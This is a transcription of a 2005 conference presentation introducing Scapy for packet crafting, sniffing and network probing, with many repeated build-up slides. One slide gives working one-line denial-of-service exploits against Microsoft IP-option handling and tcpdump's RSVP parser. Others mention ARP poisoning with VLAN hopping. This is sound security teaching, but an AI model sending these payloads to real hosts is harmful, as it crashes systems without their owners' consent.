Packet generation and network based attacks with Scapy
|
|
|
- Amanda Golden
- 10 years ago
- Views:
Transcription
1 Packet generation and network based attacks with / Corporate Research Center SSI Department Suresnes, FRANCE CanSecWest/core05, May 4-6, 2005 Packet generation and network based attacks with
2 Outline 1 Introduction Forewords Learning Python in 2 slides State of the art Problematic 2 3 One shots Scanning TTL tricks 4 Conclusion Packet generation and network based attacks with
3 Outline Introduction Forewords Learning Python in 2 slides State of the art Problematic 1 Introduction Forewords Learning Python in 2 slides State of the art Problematic 2 3 One shots Scanning TTL tricks 4 Conclusion Packet generation and network based attacks with
4 Aims of this presentation Forewords Learning Python in 2 slides State of the art Problematic Explain some problems present in network packet tools I tried to overcome with Let you discover Give some network tricks and show you how easy it is to perform them with Packet generation and network based attacks with
5 Outline Introduction Forewords Learning Python in 2 slides State of the art Problematic 1 Introduction Forewords Learning Python in 2 slides State of the art Problematic 2 3 One shots Scanning TTL tricks 4 Conclusion Packet generation and network based attacks with
6 Learning Python in 2 slides (1/2) Forewords Learning Python in 2 slides State of the art Problematic This is an int (signed, 32bits) : 42 This is a long (signed, infinite): 42L This is a str : "bell\x07\n" or bell\x07\n (" ) This is a tuple (immutable): (1,4,"42") This is a list (mutable): [4,2,"1"] This is a dict (mutable): { "one":1, "two":2 } Packet generation and network based attacks with
7 Learning Python in 2 slides (2/2) Forewords Learning Python in 2 slides State of the art Problematic No block delimiters. Indentation does matter. try: if cond1: instr instr except exception: instr instr elif cond2: else: instr instr else: instr while cond: instr instr def fact(x): if x == 0: return 1 else: return x*fact(x-1) for var in set: instr lambda x,y: x+y Packet generation and network based attacks with
8 Outline Introduction Forewords Learning Python in 2 slides State of the art Problematic 1 Introduction Forewords Learning Python in 2 slides State of the art Problematic 2 3 One shots Scanning TTL tricks 4 Conclusion Packet generation and network based attacks with
9 Forewords Learning Python in 2 slides State of the art Problematic Quick goal-oriented taxonomy of packet building tools Scanning Fingerprinting Testing Attacking Packet forging Sniffing Packet forging tool: forges packets and sends them Sniffing tool: captures packets and possibly dissects them Testing tool: does unitary tests. Usually tries to answer a yes/no question (ex: ping) Scanning tool: does a bunch of unitary tests with some parameters varying in a given range Fingerprinting tool: does some predefined eclectic unitary tests to discriminate a peer Attacking tool: uses some unexpected values in a protocol Packet generation and network based attacks with
10 Many programs Sorry for possible classification errors! Forewords Learning Python in 2 slides State of the art Problematic Sniffing tools ethereal, tcpdump, net2pcap, cdpsniffer, aimsniffer, vomit, tcptrace, tcptrack, nstreams, argus, karpski, ipgrab, nast, cdpr, aldebaran, dsniff, irpas, iptraf,... Packet forging tools packeth, packit, packet excalibur, nemesis, tcpinject, libnet, IP sorcery, pacgen, arp-sk, arpspoof, dnet, dpkt, pixiliate, irpas, sendip, IP-packetgenerator, sing, aicmpsend, libpal,... Packet generation and network based attacks with
11 Many programs Introduction Forewords Learning Python in 2 slides State of the art Problematic Testing tools ping, hping2, hping3, traceroute, tctrace, tcptraceroute, traceproto, fping, arping,... Scanning tools nmap, amap, vmap, hping3, unicornscan, ttlscan, ikescan, paketto, firewalk,... Fingerpringing tools nmap, xprobe, p0f, cron-os, queso, ikescan, amap, synscan,... Attacking tools dnsspoof, poison ivy, ikeprobe, ettercap, dsniff suite, cain, hunt, airpwn, irpas, nast, yersinia,... Packet generation and network based attacks with
12 Outline Introduction Forewords Learning Python in 2 slides State of the art Problematic 1 Introduction Forewords Learning Python in 2 slides State of the art Problematic 2 3 One shots Scanning TTL tricks 4 Conclusion Packet generation and network based attacks with
13 Forewords Learning Python in 2 slides State of the art Problematic Most tools can t forge exactly what you want Building a single working packet from scratch in C takes an average of 60 lines The same with a command line tool is near unbearable, and is really unbearable for a set of packets = Popular tools use templates or scenarii with few fields to fill to get a working (set of) packets = You ll never do something the author did not imagine Example Try to find a tool that can do an ICMP echo request with some given padding data an IP protocol scan with the More Fragments flag some ARP cache poisoning with a VLAN hopping attack a traceroute with an applicative payload (DNS, ISAKMP, etc.) Packet generation and network based attacks with
14 Forewords Learning Python in 2 slides State of the art Problematic Most tools interpret what they receive Most tools interpret packets they receive Work according to what the programmer expected to receive = unexpected things keep being unnoticed Example # hping --icmp HPING (eth ): icmp mode set, [...] len=46 ip= ttl=64 id=42457 icmp_seq=0 rtt=2.7 ms Packet generation and network based attacks with
15 Forewords Learning Python in 2 slides State of the art Problematic Most tools interpret what they receive Most tools interpret packets they receive Work according to what the programmer expected to receive = unexpected things keep being unnoticed Example # hping --icmp HPING (eth ): icmp mode set, [...] len=46 ip= ttl=64 id=42457 icmp_seq=0 rtt=2.7 ms IP > : icmp 8: echo reply seq d3f d 4b G../..A.K...E. 001c a5d a8 c0a [email protected] e f6 e e5 c24b...k Packet generation and network based attacks with
![..] len=46 ip=192.168.8.1 ttl=64 id=42457 icmp_seq=0 rtt=2.7 ms IP 192.168.8.1 > 192.168.8.14: icmp 8: echo reply seq 0 0001 4321 1d3f 0002 413d 4b23 0800 4500..G../..A.K.](/docs-images/54/9602962/images/page_15.jpg "..E. 001c a5d9 0000 4001 43a8 c0a8 0801 c0a8...@.c... 080e 0000 16f6 e909 0000 0000 0000 0000... 0000 0000 0000 0000 13e5 c24b.")
16 Forewords Learning Python in 2 slides State of the art Problematic Most tools interpret what they receive Most tools interpret packets they receive Work according to what the programmer expected to receive = unexpected things keep being unnoticed Example # hping --icmp HPING (eth ): icmp mode set, [...] len=46 ip= ttl=64 id=42457 icmp_seq=0 rtt=2.7 ms IP > : icmp 8: echo reply seq d3f d 4b G../..A.K...E. 001c a5d a8 c0a [email protected] e f6 e e5 c24b...k Packet generation and network based attacks with
![..] len=46 ip=192.168.8.1 ttl=64 id=42457 icmp_seq=0 rtt=2.7 ms IP 192.168.8.1 > 192.168.8.14: icmp 8: echo reply seq 0 0001 4321 1d3f 0002 413d 4b23 0800 4500..G../..A.K.](/docs-images/54/9602962/images/page_16.jpg "..E. 001c a5d9 0000 4001 43a8 c0a8 0801 c0a8...@.c... 080e 0000 16f6 e909 0000 0000 0000 0000... 0000 0000 0000 0000 13e5 c24b.")
17 Forewords Learning Python in 2 slides State of the art Problematic Most tools interpret what they receive Most tools interpret packets they receive Work according to what the programmer expected to receive = unexpected things keep being unnoticed Example # hping --icmp HPING (eth ): icmp mode set, [...] len=46 ip= ttl=64 id=42457 icmp_seq=0 rtt=2.7 ms IP > : icmp 8: echo reply seq d3f d 4b G../..A.K...E. 001c a5d a8 c0a [email protected] e f6 e e5 c24b...k Packet generation and network based attacks with
![..] len=46 ip=192.168.8.1 ttl=64 id=42457 icmp_seq=0 rtt=2.7 ms IP 192.168.8.1 > 192.168.8.14: icmp 8: echo reply seq 0 0001 4321 1d3f 0002 413d 4b23 0800 4500..G../..A.K.](/docs-images/54/9602962/images/page_17.jpg "..E. 001c a5d9 0000 4001 43a8 c0a8 0801 c0a8...@.c... 080e 0000 16f6 e909 0000 0000 0000 0000... 0000 0000 0000 0000 13e5 c24b.")
18 Forewords Learning Python in 2 slides State of the art Problematic Most tools interpret what they receive Most tools interpret packets they receive Work according to what the programmer expected to receive = unexpected things keep being unnoticed Example # hping --icmp HPING (eth ): icmp mode set, [...] len=46 ip= ttl=64 id=42457 icmp_seq=0 rtt=2.7 ms IP > : icmp 8: echo reply seq d3f d 4b G../..A.K...E. 001c a5d a8 c0a [email protected] e f6 e e5 c24b...k Packet generation and network based attacks with
![..] len=46 ip=192.168.8.1 ttl=64 id=42457 icmp_seq=0 rtt=2.7 ms IP 192.168.8.1 > 192.168.8.14: icmp 8: echo reply seq 0 0001 4321 1d3f 0002 413d 4b23 0800 4500..G../..A.K.](/docs-images/54/9602962/images/page_18.jpg "..E. 001c a5d9 0000 4001 43a8 c0a8 0801 c0a8...@.c... 080e 0000 16f6 e909 0000 0000 0000 0000... 0000 0000 0000 0000 13e5 c24b.")
19 Forewords Learning Python in 2 slides State of the art Problematic Most tools interpret what they receive Most tools interpret packets they receive Work according to what the programmer expected to receive = unexpected things keep being unnoticed Example # hping --icmp HPING (eth ): icmp mode set, [...] len=46 ip= ttl=64 id=42457 icmp_seq=0 rtt=2.7 ms IP > : icmp 8: echo reply seq d3f d 4b G../..A.K...E. 001c a5d a8 c0a [email protected] e f6 e e5 c24b...k Did you see? Packet generation and network based attacks with
![..] len=46 ip=192.168.8.1 ttl=64 id=42457 icmp_seq=0 rtt=2.7 ms IP 192.168.8.1 > 192.168.8.14: icmp 8: echo reply seq 0 0001 4321 1d3f 0002 413d 4b23 0800 4500..G../..A.K...E.](/docs-images/54/9602962/images/page_19.jpg "001c a5d9 0000 4001 43a8 c0a8 0801 c0a8...@.c... 080e 0000 16f6 e909 0000 0000 0000 0000... 0000 0000 0000 0000 13e5 c24b...k Did you see?")
20 Forewords Learning Python in 2 slides State of the art Problematic Most tools interpret what they receive Most tools interpret packets they receive Work according to what the programmer expected to receive = unexpected things keep being unnoticed Example # hping --icmp HPING (eth ): icmp mode set, [...] len=46 ip= ttl=64 id=42457 icmp_seq=0 rtt=2.7 ms IP > : icmp 8: echo reply seq d3f d 4b G../..A.K...E. 001c a5d a8 c0a [email protected] e f6 e e5 c24b...k Did you see? Some data leaked into the padding (Etherleaking). Packet generation and network based attacks with
21 Forewords Learning Python in 2 slides State of the art Problematic Some tools give a limited interpretation Interpretation is sometimes insufficient for a good network discovery Example Interesting ports on : PORT STATE SERVICE 22/tcp filtered ssh Do you really know what happened? No answer? ICMP host unreachable? from who? ICMP port administratively prohibited? from who?... Packet generation and network based attacks with
22 Forewords Learning Python in 2 slides State of the art Problematic Popular tools bias our perception of networked systems Very few popular tools (nmap, hping) Popular tools give a subjective vision of tested systems = The world is seen through those tools = You won t notice what they can t see = Bugs, flaws,...may remain unnoticed on very well tested systems because they are always seen through the same tools, with the same bias Packet generation and network based attacks with
23 Outline Introduction 1 Introduction Forewords Learning Python in 2 slides State of the art Problematic 2 3 One shots Scanning TTL tricks 4 Conclusion Packet generation and network based attacks with
24 The The spark that lit the powder Introduction The problem Scan a C class with a TCP syn on port 80 and a given TTL Needed to know which IP addresses did not answer an ICMP time exceeded in transit The only available solution at that time hping to send the packets, one by one, with Ctrl-Z to increment the IP tcpdump to observe the result Isn t that a shame? Packet generation and network based attacks with
25 The The original concept Introduction The original idea was that I needed : A way to describe efficiently a set of packets of any kind, and to be able to choose the value of any bit A way to build them A way to send them, receive answers and match requests and replies A way to interpret/represent the result Packet generation and network based attacks with
26 Actual Architecture Introduction Net Routing ARP DNS Send Receive Packet Manipulation Assembly Disassembly Send Receive Match Result Manipulation Visualisation Packet generation and network based attacks with
27 Outline Introduction 1 Introduction Forewords Learning Python in 2 slides State of the art Problematic 2 3 One shots Scanning TTL tricks 4 Conclusion Packet generation and network based attacks with
28 s Main Python interpreter disguised as a Domain Specific Language Fast packet designing Default values that work Unlimited combinations Probe once, interpret many Interactive packet and result manipulation Packet generation and network based attacks with
29 as a Domain Specific Language List of layers >>> ls() ARP : ARP DHCP : DHCP options DNS : DNS Dot11 : [...] List of commands >>> lsc() sr : Send and receive packets at layer 3 sr1 : Send packets at layer 3 and return only the fi srp : Send and receive packets at layer 2 [...] Packet generation and network based attacks with
30 Fast packet designing Example Each packet is built layer by layer (ex: Ether, IP, TCP,...) Each layer can be stacked on another Each layer or packet can be manipulated Each field has working default values Each field can contain a value or a set of values >>> a=ip(dst=" id=0x42) >>> a.ttl=12 >>> b=tcp(dport=[22,23,25,80,443]) >>> c=a/b Packet generation and network based attacks with
31 Fast packet designing How to order food at a Fast Food I want a BigMac, French Fries with Ketchup and Mayonnaise, up to 9 Chicken Wings and a Diet Coke How to order a Packet with I want a broadcast MAC address, and IP payload to ketchup.com and to mayo.com, TTL value from 1 to 9, and an UDP payload. Ether(dst="ff:ff:ff:ff:ff:ff") /IP(dst=["ketchup.com","mayo.com"],ttl=(1,9)) /UDP() We have 18 packets defined in 1 line (1 implicit packet) Packet generation and network based attacks with
32 Fast packet designing How to order food at a Fast Food I want a BigMac, French Fries with Ketchup and Mayonnaise, up to 9 Chicken Wings and a Diet Coke How to order a Packet with I want a broadcast MAC address, and IP payload to ketchup.com and to mayo.com, TTL value from 1 to 9, and an UDP payload. Ether(dst="ff:ff:ff:ff:ff:ff") /IP(dst=["ketchup.com","mayo.com"],ttl=(1,9)) /UDP() We have 18 packets defined in 1 line (1 implicit packet) Packet generation and network based attacks with
33 Default values that work If not overriden, IP source is chosen according to destination and routing table Checksum is computed Source MAC is chosen according to output interface Ethernet type and IP protocol are determined by upper layer... Other fields default values are chosen to be the most useful ones: TCP source port is 20, destination port is 80 UDP source and destination ports are 53 ICMP type is echo request... Packet generation and network based attacks with
34 Default values that work Example : Default Values for IP >>> ls(ip) version : BitField = (4) ihl : BitField = (None) tos : XByteField = (0) len : ShortField = (None) id : ShortField = (1) flags : FlagsField = (0) frag : BitField = (0) ttl : ByteField = (64) proto : ByteEnumField = (0) chksum : XShortField = (None) src : Emph = (None) dst : Emph = ( ) options : IPoptionsField = ( ) Packet generation and network based attacks with
35 Unlimited combinations With, you can Stack what you want where you want Put any value you want in any field you want Example STP()/IP(options="love",chksum=0x1234) /Dot1Q(prio=1)/Ether(type=0x1234) /Dot1Q(vlan=(2,123))/TCP() You know ARP cache poisonning and vlan hopping = you can poison a cache with a double VLAN encapsulation You know VOIP decoding, and WEP = you can decode a WEP encrypted VOIP capture You know ISAKMP and tracerouting = you can traceroute to VPN concentrators Packet generation and network based attacks with
36 Probe once, interpret many Main difference with other tools : The result of a probe is made of the list of couples (packet sent, packet received) the list of unreplied packet Interpretation/representation of the result is done independently = you can refine an interpretation without needing a new probe Example You do a TCP scan on an host and see some open ports, a closed one, and no answer for the others = you don t need a new probe to check the TTL or the IPID of the answers and determine whether it was the same box Packet generation and network based attacks with
37 Outline Introduction 1 Introduction Forewords Learning Python in 2 slides State of the art Problematic 2 3 One shots Scanning TTL tricks 4 Conclusion Packet generation and network based attacks with
38 Packet manipulation First steps >>> Packet generation and network based attacks with
39 Packet manipulation First steps >>> a=ip(ttl=10) >>> Packet generation and network based attacks with
40 Packet manipulation First steps >>> a=ip(ttl=10) >>> a < IP ttl=10 > >>> Packet generation and network based attacks with
41 Packet manipulation First steps >>> a=ip(ttl=10) >>> a < IP ttl=10 > >>> a.src >>> Packet generation and network based attacks with
42 Packet manipulation First steps >>> a=ip(ttl=10) >>> a < IP ttl=10 > >>> a.src >>> a.dst=" " >>> Packet generation and network based attacks with
43 Packet manipulation First steps >>> a=ip(ttl=10) >>> a < IP ttl=10 > >>> a.src >>> a.dst=" " >>> a < IP ttl=10 dst= > >>> Packet generation and network based attacks with
44 Packet manipulation First steps >>> a=ip(ttl=10) >>> a < IP ttl=10 > >>> a.src >>> a.dst=" " >>> a < IP ttl=10 dst= > >>> a.src >>> Packet generation and network based attacks with
45 Packet manipulation First steps >>> a=ip(ttl=10) >>> a < IP ttl=10 > >>> a.src >>> a.dst=" " >>> a < IP ttl=10 dst= > >>> a.src >>> del(a.ttl) >>> Packet generation and network based attacks with
46 Packet manipulation First steps >>> a=ip(ttl=10) >>> a < IP ttl=10 > >>> a.src >>> a.dst=" " >>> a < IP ttl=10 dst= > >>> a.src >>> del(a.ttl) >>> a < IP dst= > >>> Packet generation and network based attacks with
47 Packet manipulation First steps >>> a=ip(ttl=10) >>> a < IP ttl=10 > >>> a.src >>> a.dst=" " >>> a < IP ttl=10 dst= > >>> a.src >>> del(a.ttl) >>> a < IP dst= > >>> a.ttl 64 Packet generation and network based attacks with
48 Packet manipulation Stacking >>> Packet generation and network based attacks with
49 Packet manipulation Stacking >>> b=a/tcp(flags="sf") >>> Packet generation and network based attacks with
50 Packet manipulation Stacking >>> b=a/tcp(flags="sf") >>> b < IP proto=tcp dst= < TCP flags=fs >> >>> Packet generation and network based attacks with
51 Packet manipulation Stacking >>> b=a/tcp(flags="sf") >>> b < IP proto=tcp dst= < TCP flags=fs >> >>> b.show() ---[ IP ]--- version = 4 ihl = 0 tos = 0x0 len = 0 id = 1 flags = frag = 0 ttl = 64 proto = TCP chksum = 0x0 src = dst = options = ---[ TCP ]--- sport = 20 dport = 80 seq = 0 ack = 0 dataofs = 0 reserved = 0 flags = FS window = 0 chksum = 0x0 urgptr = 0 options = Packet generation and network based attacks with
52 Packet Manipulation Building and Dissecting >>> Packet generation and network based attacks with
53 Packet Manipulation Building and Dissecting >>> str(b) 1\x01\x00\x14\x00P\x00\x00\x00\x00\x00\x00\x00\x00P\x03\x00\x00% \x1e\x00\x00 >>> Packet generation and network based attacks with
54 Packet Manipulation Building and Dissecting >>> str(b) 1\x01\x00\x14\x00P\x00\x00\x00\x00\x00\x00\x00\x00P\x03\x00\x00% \x1e\x00\x00 >>> IP( ) < IP version=4l ihl=5l tos=0x0 len=40 id=1 flags= frag=0l ttl=64 proto=tcp chksum=0xf06f src= dst= options= < TCP sport=20 dport=80 seq=0l ack=0l dataofs=5l reserved=16l flags=fs window=0 chksum=0x251e urgptr=0 >> Packet generation and network based attacks with
55 Packet Manipulation Implicit Packets >>> Packet generation and network based attacks with
56 Packet Manipulation Implicit Packets >>> b.ttl=(10,14) >>> Packet generation and network based attacks with
57 Packet Manipulation Implicit Packets >>> b.ttl=(10,14) >>> b.payload.dport=[80,443] >>> Packet generation and network based attacks with
58 Packet Manipulation Implicit Packets >>> b.ttl=(10,14) >>> b.payload.dport=[80,443] >>> [k for k in b] [< IP ttl=10 proto=tcp dst= < TCP dport=80 flags=fs >>, < IP ttl=10 proto=tcp dst= < TCP dport=443 flags=fs >>, < IP ttl=11 proto=tcp dst= < TCP dport=80 flags=fs >>, < IP ttl=11 proto=tcp dst= < TCP dport=443 flags=fs >>, < IP ttl=12 proto=tcp dst= < TCP dport=80 flags=fs >>, < IP ttl=12 proto=tcp dst= < TCP dport=443 flags=fs >>, < IP ttl=13 proto=tcp dst= < TCP dport=80 flags=fs >>, < IP ttl=13 proto=tcp dst= < TCP dport=443 flags=fs >>, < IP ttl=14 proto=tcp dst= < TCP dport=80 flags=fs >>, < IP ttl=14 proto=tcp dst= < TCP dport=443 flags=fs >>] Packet generation and network based attacks with
59 Pretty printing Introduction >>> Packet generation and network based attacks with
60 Pretty printing Introduction >>> a=ip(dst=" ",ttl=12)/udp(dport=123) >>> Packet generation and network based attacks with
61 Pretty printing Introduction >>> a=ip(dst=" ",ttl=12)/udp(dport=123) >>> a.sprintf("the source is %IP.src%") The source is >>> Packet generation and network based attacks with
62 Pretty printing Introduction >>> a=ip(dst=" ",ttl=12)/udp(dport=123) >>> a.sprintf("the source is %IP.src%") The source is >>> f = lambda x: \ x.sprintf("dst=%ip.dst% proto=%ip.proto% dport=%udp.dport%") >>> Packet generation and network based attacks with
63 Pretty printing Introduction >>> a=ip(dst=" ",ttl=12)/udp(dport=123) >>> a.sprintf("the source is %IP.src%") The source is >>> f = lambda x: \ x.sprintf("dst=%ip.dst% proto=%ip.proto% dport=%udp.dport%") >>> f(a) dst= proto=udp dport=123 >>> Packet generation and network based attacks with
64 Pretty printing Introduction >>> a=ip(dst=" ",ttl=12)/udp(dport=123) >>> a.sprintf("the source is %IP.src%") The source is >>> f = lambda x: \ x.sprintf("dst=%ip.dst% proto=%ip.proto% dport=%udp.dport%") >>> f(a) dst= proto=udp dport=123 >>> b=ip(dst=" ")/icmp() >>> Packet generation and network based attacks with
65 Pretty printing Introduction >>> a=ip(dst=" ",ttl=12)/udp(dport=123) >>> a.sprintf("the source is %IP.src%") The source is >>> f = lambda x: \ x.sprintf("dst=%ip.dst% proto=%ip.proto% dport=%udp.dport%") >>> f(a) dst= proto=udp dport=123 >>> b=ip(dst=" ")/icmp() >>> f(b) dst= proto=icmp dport=?? >>> Packet generation and network based attacks with
66 Pretty printing Introduction >>> a=ip(dst=" ",ttl=12)/udp(dport=123) >>> a.sprintf("the source is %IP.src%") The source is >>> f = lambda x: \ x.sprintf("dst=%ip.dst% proto=%ip.proto% dport=%udp.dport%") >>> f(a) dst= proto=udp dport=123 >>> b=ip(dst=" ")/icmp() >>> f(b) dst= proto=icmp dport=?? >>> f = lambda x: \ x.sprintf("dst=%ip.dst%\ proto=%ip.proto%{udp: dport=%udp.dport%}") >>> Packet generation and network based attacks with
67 Pretty printing Introduction >>> a=ip(dst=" ",ttl=12)/udp(dport=123) >>> a.sprintf("the source is %IP.src%") The source is >>> f = lambda x: \ x.sprintf("dst=%ip.dst% proto=%ip.proto% dport=%udp.dport%") >>> f(a) dst= proto=udp dport=123 >>> b=ip(dst=" ")/icmp() >>> f(b) dst= proto=icmp dport=?? >>> f = lambda x: \ x.sprintf("dst=%ip.dst%\ proto=%ip.proto%{udp: dport=%udp.dport%}") >>> f(a) dst= proto=udp dport=123 >>> Packet generation and network based attacks with
68 Pretty printing Introduction >>> a=ip(dst=" ",ttl=12)/udp(dport=123) >>> a.sprintf("the source is %IP.src%") The source is >>> f = lambda x: \ x.sprintf("dst=%ip.dst% proto=%ip.proto% dport=%udp.dport%") >>> f(a) dst= proto=udp dport=123 >>> b=ip(dst=" ")/icmp() >>> f(b) dst= proto=icmp dport=?? >>> f = lambda x: \ x.sprintf("dst=%ip.dst%\ proto=%ip.proto%{udp: dport=%udp.dport%}") >>> f(a) dst= proto=udp dport=123 >>> f(b) dst= proto=icmp Packet generation and network based attacks with
69 Configuration Introduction >>> conf checkipid = 1 checkipsrc = 1 color_theme = <class scapy.defaulttheme at 0xb7eef86c> except_filter = histfile = /home/pbi/.scapy_history iface = eth0 nmap_base = /usr/share/nmap/nmap-os-fingerprints p0f_base = /etc/p0f.fp route = Network Netmask Gateway Iface lo eth eth eth0 session = sniff_promisc = 0 wepkey = Packet generation and network based attacks with
70 Sending Introduction >>> Packet generation and network based attacks with
71 Sending Introduction >>> send(b)... Sent 10 packets. >>> Packet generation and network based attacks with
72 Sending Introduction >>> send(b)... Sent 10 packets. >>> send([b]*3)... Sent 30 packets. >>> Packet generation and network based attacks with
73 Sending Introduction >>> send(b)... Sent 10 packets. >>> send([b]*3)... Sent 30 packets. >>> send(b,inter=0.1,loop=1)...^c Sent 27 packets. >>> Packet generation and network based attacks with
74 Sending Introduction >>> send(b)... Sent 10 packets. >>> send([b]*3)... Sent 30 packets. >>> send(b,inter=0.1,loop=1)...^c Sent 27 packets. >>> sendp("i m travelling on Ethernet ", iface="eth0") Packet generation and network based attacks with
75 Sending Introduction >>> send(b)... Sent 10 packets. >>> send([b]*3)... Sent 30 packets. >>> send(b,inter=0.1,loop=1)...^c Sent 27 packets. >>> sendp("i m travelling on Ethernet ", iface="eth0") tcpdump output: 01:55: :76:65:6c:6c:69 > 49:27:6d:20:74:72, ethertype Unknown (0x6e67), length 27: d c 6c69 6e67 206f I m.travelling.o 6e e n.ethernet. Packet generation and network based attacks with
76 Sending Introduction Microsoft IP option DoS proof of concept is 115 lines of C code (without comments) The same with : send(ip(dst="target",options="\x02\x27"+"x"*38)/tcp()) tcpdump and Ethereal rsvp print() Remote Denial of Service Exploit : 225 lines The same with : send( IP(dst=" ",proto="GRE")/ \x00\x00\x00\xfe\x83\x1b \x01\x06\x12\x01\xff\x07\xff\xff\xff\xff\xff\xff\xff \xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x01\x07 \x00\x00 ) Packet generation and network based attacks with
77 Sniffing and PCAP file format interface >>> Packet generation and network based attacks with
78 Sniffing and PCAP file format interface >>> sniff(count=5,filter="tcp") Packet generation and network based attacks with
79 Sniffing and PCAP file format interface >>> sniff(count=5,filter="tcp") < Sniffed: UDP:0 TCP:5 ICMP:0 Other:0> >>> Packet generation and network based attacks with
80 Sniffing and PCAP file format interface >>> sniff(count=5,filter="tcp") < Sniffed: UDP:0 TCP:5 ICMP:0 Other:0> >>> sniff(count=2, prn=lambda x:x.summary()) Packet generation and network based attacks with
81 Sniffing and PCAP file format interface >>> sniff(count=5,filter="tcp") < Sniffed: UDP:0 TCP:5 ICMP:0 Other:0> >>> sniff(count=2, prn=lambda x:x.summary()) Ether / IP / TCP :3021 > :22 PA / Raw Packet generation and network based attacks with
82 Sniffing and PCAP file format interface >>> sniff(count=5,filter="tcp") < Sniffed: UDP:0 TCP:5 ICMP:0 Other:0> >>> sniff(count=2, prn=lambda x:x.summary()) Ether / IP / TCP :3021 > :22 PA / Raw Ether / IP / TCP :22 > :3021 PA / Raw < Sniffed: UDP:0 TCP:2 ICMP:0 Other:0> >>> Packet generation and network based attacks with
83 Sniffing and PCAP file format interface >>> sniff(count=5,filter="tcp") < Sniffed: UDP:0 TCP:5 ICMP:0 Other:0> >>> sniff(count=2, prn=lambda x:x.summary()) Ether / IP / TCP :3021 > :22 PA / Raw Ether / IP / TCP :22 > :3021 PA / Raw < Sniffed: UDP:0 TCP:2 ICMP:0 Other:0> >>> a= >>> Packet generation and network based attacks with
84 Sniffing and PCAP file format interface >>> sniff(count=5,filter="tcp") < Sniffed: UDP:0 TCP:5 ICMP:0 Other:0> >>> sniff(count=2, prn=lambda x:x.summary()) Ether / IP / TCP :3021 > :22 PA / Raw Ether / IP / TCP :22 > :3021 PA / Raw < Sniffed: UDP:0 TCP:2 ICMP:0 Other:0> >>> a= >>> a.summary() Ether / IP / TCP :3021 > :22 PA / Raw Ether / IP / TCP :22 > :3021 PA / Raw >>> Packet generation and network based attacks with
85 Sniffing and PCAP file format interface >>> sniff(count=5,filter="tcp") < Sniffed: UDP:0 TCP:5 ICMP:0 Other:0> >>> sniff(count=2, prn=lambda x:x.summary()) Ether / IP / TCP :3021 > :22 PA / Raw Ether / IP / TCP :22 > :3021 PA / Raw < Sniffed: UDP:0 TCP:2 ICMP:0 Other:0> >>> a= >>> a.summary() Ether / IP / TCP :3021 > :22 PA / Raw Ether / IP / TCP :22 > :3021 PA / Raw >>> wrpcap("/tmp/test.cap", a) >>> Packet generation and network based attacks with
86 Sniffing and PCAP file format interface >>> sniff(count=5,filter="tcp") < Sniffed: UDP:0 TCP:5 ICMP:0 Other:0> >>> sniff(count=2, prn=lambda x:x.summary()) Ether / IP / TCP :3021 > :22 PA / Raw Ether / IP / TCP :22 > :3021 PA / Raw < Sniffed: UDP:0 TCP:2 ICMP:0 Other:0> >>> a= >>> a.summary() Ether / IP / TCP :3021 > :22 PA / Raw Ether / IP / TCP :22 > :3021 PA / Raw >>> wrpcap("/tmp/test.cap", a) >>> rdpcap("/tmp/test.cap") < test.cap: UDP:0 TCP:2 ICMP:0 Other:0> >>> Packet generation and network based attacks with
87 Sniffing and PCAP file format interface >>> sniff(count=5,filter="tcp") < Sniffed: UDP:0 TCP:5 ICMP:0 Other:0> >>> sniff(count=2, prn=lambda x:x.summary()) Ether / IP / TCP :3021 > :22 PA / Raw Ether / IP / TCP :22 > :3021 PA / Raw < Sniffed: UDP:0 TCP:2 ICMP:0 Other:0> >>> a= >>> a.summary() Ether / IP / TCP :3021 > :22 PA / Raw Ether / IP / TCP :22 > :3021 PA / Raw >>> wrpcap("/tmp/test.cap", a) >>> rdpcap("/tmp/test.cap") < test.cap: UDP:0 TCP:2 ICMP:0 Other:0> >>> a[0] < Ether dst=00:12:2a:71:1d:2f src=00:02:4e:9d:db:c3 type=0x800 < Packet generation and network based attacks with
88 Sniffing and Pretty Printing >>> Packet generation and network based attacks with
89 Sniffing and Pretty Printing >>> sniff( prn = lambda x: \ x.sprintf("%ip.src% > %IP.dst% %IP.proto%") ) Packet generation and network based attacks with
90 Sniffing and Pretty Printing >>> sniff( prn = lambda x: \ x.sprintf("%ip.src% > %IP.dst% %IP.proto%") ) > ICMP > ICMP > ICMP > ICMP >>> Packet generation and network based attacks with
91 Sniffing and Pretty Printing >>> sniff( prn = lambda x: \ x.sprintf("%ip.src% > %IP.dst% %IP.proto%") ) > ICMP > ICMP > ICMP > ICMP >>> a=sniff(iface="wlan0",prn=lambda x: \ x.sprintf("%dot11.addr2% ")+("#"*(x.signal/8))) Requires wlan0 interface to provide Prism headers Packet generation and network based attacks with
92 Sniffing and Pretty Printing >>> sniff( prn = lambda x: \ x.sprintf("%ip.src% > %IP.dst% %IP.proto%") ) > ICMP > ICMP > ICMP > ICMP >>> a=sniff(iface="wlan0",prn=lambda x: \ x.sprintf("%dot11.addr2% ")+("#"*(x.signal/8))) 00:06:25:4b:00:f3 ###################### 00:04:23:a0:59:bf ######### 00:04:23:a0:59:bf ######### 00:06:25:4b:00:f3 ####################### 00:0d:54:99:75:ac ################# 00:06:25:4b:00:f3 ####################### Requires wlan0 interface to provide Prism headers Packet generation and network based attacks with
93 Sending and Receiving Return first answer >>> Packet generation and network based attacks with
94 Sending and Receiving Return first answer >>> sr1( IP(dst=" ")/ICMP() ) Packet generation and network based attacks with
95 Sending and Receiving Return first answer >>> sr1( IP(dst=" ")/ICMP() ) Begin emission:..finished to send 1 packets..* Received 4 packets, got 1 answers, remaining 0 packets < IP version=4l ihl=5l tos=0x0 len=28 id=46681 flags= frag=0l ttl=64 proto=icmp chksum=0x3328 src= dst= options= < ICMP type=echo-reply code=0 chksum=0xffff id=0x0 seq=0x0 < Padding load= \x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x91\xf49\xea >>> Packet generation and network based attacks with
96 Sending and Receiving Return first answer >>> sr1( IP(dst=" ")/ICMP() ) Begin emission:..finished to send 1 packets..* Received 4 packets, got 1 answers, remaining 0 packets < IP version=4l ihl=5l tos=0x0 len=28 id=46681 flags= frag=0l ttl=64 proto=icmp chksum=0x3328 src= dst= options= < ICMP type=echo-reply code=0 chksum=0xffff id=0x0 seq=0x0 < Padding load= \x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x91\xf49\xea >>> Compare this result to hping s one : # hping --icmp HPING (eth ): icmp mode set, [...] len=46 ip= ttl=64 id=42457 icmp seq=0 rtt=2.7 ms Packet generation and network based attacks with
